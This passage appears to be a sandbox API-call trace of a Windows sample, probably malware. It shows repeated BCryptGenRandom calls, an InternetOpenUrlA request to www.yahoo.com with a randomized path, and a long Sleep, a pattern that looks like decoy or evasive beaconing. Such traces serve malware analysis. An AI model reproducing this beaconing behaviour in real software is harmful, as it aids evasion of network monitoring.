pbBuffer=0x46ffd5f) returned 0x0 [0192.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.415] GetProcessHeap () returned 0x440000 [0192.415] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473980 [0192.415] lstrcpyA (in: lpString1=0x473980, lpString2="ýè¡\x96s://www.yahoo.com" | out: lpString1="ýè¡\x96s://www.yahoo.com") returned="ýè¡\x96s://www.yahoo.com" [0192.415] lstrcatA (in: lpString1="ýè¡\x96s://www.yahoo.com", lpString2="/d8GPa9pz8igmmmgQllhV2Wtedu54546fns7f5mkbil95/lnHl5bvP3pxe707r4NAwBvhvhzPun/3wfriiZajyredUubbVu8t69NstKifioee1b8n9qS6/" | out: lpString1="ýè¡\x96s://www.yahoo.com/d8GPa9pz8igmmmgQllhV2Wtedu54546fns7f5mkbil95/lnHl5bvP3pxe707r4NAwBvhvhzPun/3wfriiZajyredUubbVu8t69NstKifioee1b8n9qS6/") returned="ýè¡\x96s://www.yahoo.com/d8GPa9pz8igmmmgQllhV2Wtedu54546fns7f5mkbil95/lnHl5bvP3pxe707r4NAwBvhvhzPun/3wfriiZajyredUubbVu8t69NstKifioee1b8n9qS6/" [0192.416] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0192.416] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="ýè¡\x96s://www.yahoo.com/d8GPa9pz8igmmmgQllhV2Wtedu54546fns7f5mkbil95/lnHl5bvP3pxe707r4NAwBvhvhzPun/3wfriiZajyredUubbVu8t69NstKifioee1b8n9qS6/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0192.417] GetProcessHeap () returned 0x440000 [0192.417] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473980 | out: hHeap=0x440000) returned 1 [0192.417] GetProcessHeap () returned 0x440000 [0192.417] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a175c0 | out: hHeap=0x440000) returned 1 [0192.418] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0192.419] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0192.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0192.420] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0192.421] Sleep (dwMilliseconds=0x1a422) [0192.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0192.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0192.657] GetProcessHeap () returned 0x440000 [0192.657] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a03250 [0192.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0192.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a03251, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x3a03251) returned 0x0 [0192.658] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.905] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0192.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a03277, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a03277) returned 0x0 [0192.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.912] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.912] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.912] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0192.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a032a7, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a032a7) returned 0x0 [0192.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.921] GetProcAddress (hModule=0x7ffc5bcc0000, 